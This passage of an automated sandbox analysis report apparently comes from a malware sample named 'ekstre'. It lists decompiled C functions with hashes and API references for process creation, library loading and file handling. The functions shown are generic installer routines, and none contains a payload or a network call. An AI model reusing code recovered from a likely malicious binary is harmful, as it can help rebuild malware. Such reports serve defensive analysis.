Instruction ID: ce6a5d20200681679d14a1f9e405c24bfa1fc7623c50f170edb0a1cbb3417517
Opcode Fuzzy Hash: e453346e6a2a61b80266914510a2d638701090c9bf32021c038cd7928819c43d
Instruction Fuzzy Hash: 6AE01A72908211CFE709EBA8EE495AEB7B4EB40329B204A7FE541F11D1DBB94D40866D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x45e750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x45e750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405c54
0x00405c74
0x00405c7c
0x00405c81
0x00000000
0x00405c87
0x00405c8b

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E750,00000000,00000000), ref: 00405C74
CloseHandle.KERNEL32(?), ref: 00405C81

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 28376316e8dbb65054eb2f5b34233d548848c488cdfe7423a54e43cf92b2d496
Instruction ID: 3af1e8069b26ce5c77d9d2df02a69335b0ea5fba402df0045a62495977d8a49f
Opcode Fuzzy Hash: 28376316e8dbb65054eb2f5b34233d548848c488cdfe7423a54e43cf92b2d496
Instruction Fuzzy Hash: 45E0B6B4600209BFFB009F65EE09F7B7BACFB04605F404926BD51F2191D778E9148A78

Uniqueness

Uniqueness Score: -1.00%

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401573(void* __ebx) {
				int _t4;
				void* _t9;
				struct HWND__* _t11;
				struct HWND__* _t12;
				void* _t16;

				_t9 = __ebx;
				_t11 =  *0x468230;
				if(_t11 != __ebx) {
					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
					_t4 =  *(_t16 - 0x30);
				}
				_t12 =  *0x468244;
				if(_t12 != _t9) {
					ShowWindow(_t12, _t4); // executed
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}

0x00401573
0x00401573
0x00401581
0x00401587
0x00401589
0x00401589
0x0040158c
0x00401594
0x0040159c
0x0040159c
0x00402c2d
0x00402c39

APIs

ShowWindow.USER32(?,?), ref: 00401587
ShowWindow.USER32(?), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 0d36e9143d10adc77b406f26fb31ecfd920e987de60b21dba69f79bab0453d53
Instruction ID: 07df1d4aaf4525ef6f5770a2c39fb638815b482eadb267d20064b3d105a994cc
Opcode Fuzzy Hash: 0d36e9143d10adc77b406f26fb31ecfd920e987de60b21dba69f79bab0453d53
Instruction Fuzzy Hash: EFE08677B101149BCB15DFA8EDA086E73A5FB44310310497FE502B3290DA749C04CB28

Uniqueness

Uniqueness Score: -1.00%

Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406a3d
0x00406a40
0x00406a47
0x00406a4f
0x00406a5b
0x00000000
0x00406a62
0x00406a52
0x00406a59
0x00000000
0x00406a6a
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
Opcode Fuzzy Hash: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79

Uniqueness

Uniqueness Score: -1.00%

Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x0040615c
0x00406169
0x0040617e
0x00406184

APIs

GetFileAttributesW.KERNELBASE(00000003,00403113,004DD000,80000000,00000003), ref: 0040615C
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040617E

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00406138
0x0040613e
0x00406143
0x0040614c
0x0040614c
0x00406155

APIs

GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040614C

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405c1c
0x00405c24
0x00000000
0x00405c2a
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403633,004D5000,004D5000,004D5000,004D5000,004D5000,00403923), ref: 00405C1C
GetLastError.KERNEL32 ref: 00405C2A

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD2D14 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E6DDD2D14(intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t44;
				void* _t47;
				signed int _t53;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t67;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t78;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t86;
				intOrPtr _t87;

				if( *0x6ddd5024 != 0 && E6DDD1BC1(_a4) == 0) {
					 *0x6ddd5030 = _t86;
					if( *0x6ddd5034 != 0) {
						_t86 =  *0x6ddd5034;
					} else {
						E6DDD3250(E6DDD1C43());
						 *0x6ddd5034 = _t86;
					}
				}
				_t28 = E6DDD1C49(_a4);
				_t87 = _t86 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6DDD1BBB();
					_t67 = _a4;
					_t74 =  *0x6ddd5028;
					 *((intOrPtr*)(_t29 + _t67)) = _t74;
					 *0x6ddd5028 = _t67;
					E6DDD1C5A();
					_t33 = EnumWindows(??, ??); // executed
					 *0x6ddd5000 = _t33;
					 *0x6ddd5004 = _t74;
					if( *0x6ddd5024 != 0 && E6DDD1BC1( *0x6ddd5028) == 0) {
						 *0x6ddd5034 = _t87;
						_t87 =  *0x6ddd5030;
					}
					_t75 =  *0x6ddd5028;
					_a4 = _t75;
					 *0x6ddd5028 =  *((intOrPtr*)(E6DDD1BBB() + _t75));
					_t37 = E6DDD1BAD(_t75);
					_pop(_t76);
					if(_t37 != 0) {
						_t37 = E6DDD1C49(_t76);
						if(_t37 > 0) {
							_push(_t37);
							_push(E6DDD1C54() + _a4 + _v8);
							_push(E6DDD1C64());
							if( *0x6ddd5024 <= 0 || E6DDD1BC1(_a4) != 0) {
								_pop(_t81);
								_pop(_t44);
								if( *((intOrPtr*)(_t44 + _t81)) == 2) {
								}
								_pop(_t76);
								_t37 = _t44 + _v8;
								asm("loop 0xfffffff5");
							} else {
								_pop(_t82);
								_pop(_t47);
								_t78 =  *(_t47 + _t82);
								_t64 =  *0x6ddd5034;
								_t76 = _t64 + _t78 * 4;
								 *0x6ddd5034 = _t64 + _t78 * 4;
								_t37 = _t47 + _v8;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x6ddd5028 == 0) {
						 *0x6ddd5034 = 0;
					}
					_push( *0x6ddd5004);
					E6DDD2CBF(_t37, _t64, _t76, _a4,  *0x6ddd5000);
					return _a4;
				}
				_push(E6DDD1C54() + _a4);
				_t53 = E6DDD1C60();
				_v8 = _t53;
				_t72 = _t28;
				_push(_t65 + _t53 * _t72);
				_t64 = E6DDD1CC3();
				_t80 = E6DDD1CBF();
				_t83 = E6DDD1C64();
				_t58 = _t72;
				if( *((intOrPtr*)(_t58 + _t83)) == 2) {
					_push( *((intOrPtr*)(_t58 + _t64)));
				}
				_push( *((intOrPtr*)(_t58 + _t80)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6ddd2d24
0x6ddd2d35
0x6ddd2d42
0x6ddd2d56
0x6ddd2d44
0x6ddd2d49
0x6ddd2d4e
0x6ddd2d4e
0x6ddd2d42
0x6ddd2d5f
0x6ddd2d64
0x6ddd2d6a
0x6ddd2dae
0x6ddd2dae
0x6ddd2db3
0x6ddd2db8
0x6ddd2dbe
0x6ddd2dc0
0x6ddd2dc6
0x6ddd2dd3
0x6ddd2dd5
0x6ddd2dda
0x6ddd2de7
0x6ddd2dfa
0x6ddd2e00
0x6ddd2e06
0x6ddd2e07
0x6ddd2e0d
0x6ddd2e19
0x6ddd2e1f
0x6ddd2e27
0x6ddd2e28
0x6ddd2e2b
0x6ddd2e36
0x6ddd2e38
0x6ddd2e44
0x6ddd2e4a
0x6ddd2e52
0x6ddd2e7e
0x6ddd2e7f
0x6ddd2e85
0x6ddd2e85
0x6ddd2e88
0x6ddd2e89
0x6ddd2e8c
0x6ddd2e62
0x6ddd2e62
0x6ddd2e63
0x6ddd2e65
0x6ddd2e68
0x6ddd2e6e
0x6ddd2e71
0x6ddd2e77
0x6ddd2e7a
0x6ddd2e7a
0x6ddd2e52
0x6ddd2e36
0x6ddd2e95
0x6ddd2e97
0x6ddd2e97
0x6ddd2ea1
0x6ddd2eb0
0x6ddd2ebe
0x6ddd2ebe
0x6ddd2d75
0x6ddd2d76
0x6ddd2d7b
0x6ddd2d7f
0x6ddd2d84
0x6ddd2d98
0x6ddd2d99
0x6ddd2d9a
0x6ddd2d9c
0x6ddd2da1
0x6ddd2da3
0x6ddd2da3
0x6ddd2da6
0x6ddd2dac
0x00000000

APIs

EnumWindows.USER32(?), ref: 6DDD2DD3

Memory Dump Source

Source File: 00000000.00000002.1347263504.000000006DDD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DDD0000, based on PE: true

Associated: 00000000.00000002.1347232243.000000006DDD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347305831.000000006DDD4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347348567.000000006DDD6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ddd0000_ekstre.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: c2d2fa7b904a8bad57b46aa2153bbad403708cc76ea4375c52f841eace81ef91
Instruction ID: 4be983acda87db5cdf5874174c541d4db4d8e4829b860d23a4681eb2cbfa057b
Opcode Fuzzy Hash: c2d2fa7b904a8bad57b46aa2153bbad403708cc76ea4375c52f841eace81ef91
Instruction Fuzzy Hash: FF418D71849205DFEF60BFA8DA80B7A7BB5EB4735DF21452AF6048B215D734A4818BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402DA6(0xffffffd0);
				_t16 = E00402DA6(0xffffffdf);
				E00402DA6(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x28)) == _t13 || E0040699E(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E00406428(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}

0x00401684
0x0040168d
0x0040168f
0x00401696
0x0040169e
0x004016aa
0x0040292e
0x004016be
0x004016c0
0x004016c5
0x00000000
0x004016c5
0x004016a0
0x004016a0
0x004022f1
0x004022f1
0x004022f1
0x00402c2d
0x00402c39

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 5f637e1c928fe3561e9af57607934005d37ba1c6d00acf06f3b72f7e4dc2a21d
Instruction ID: 132c85f28b1d1213cef8a4be0782e789be3c02155da6d0aacb2ecb877fcdb54d
Opcode Fuzzy Hash: 5f637e1c928fe3561e9af57607934005d37ba1c6d00acf06f3b72f7e4dc2a21d
Instruction Fuzzy Hash: 85F0B431A08120E6CB11BBB69F4DE5E2194EF83368F24023FF011B21D1EABCC95255AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E004065C8(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E004065AF();
					}
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402891
0x00402891
0x00402892
0x0040289a
0x0040289f
0x004028a0
0x004028af
0x004028b8
0x004028be
0x00402ba1
0x00402ba4
0x00402ba4
0x004028b8
0x00402c2d
0x00402c39

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 019347fe24728ae9ca515ac3f5c2aa3d0375c97cec2bb7346a44873e7092ed25
Instruction ID: 0fc79dad603c2e18f43750183ddda5220b2c61aad5dd1925d46a8b17b14bc117
Opcode Fuzzy Hash: 019347fe24728ae9ca515ac3f5c2aa3d0375c97cec2bb7346a44873e7092ed25
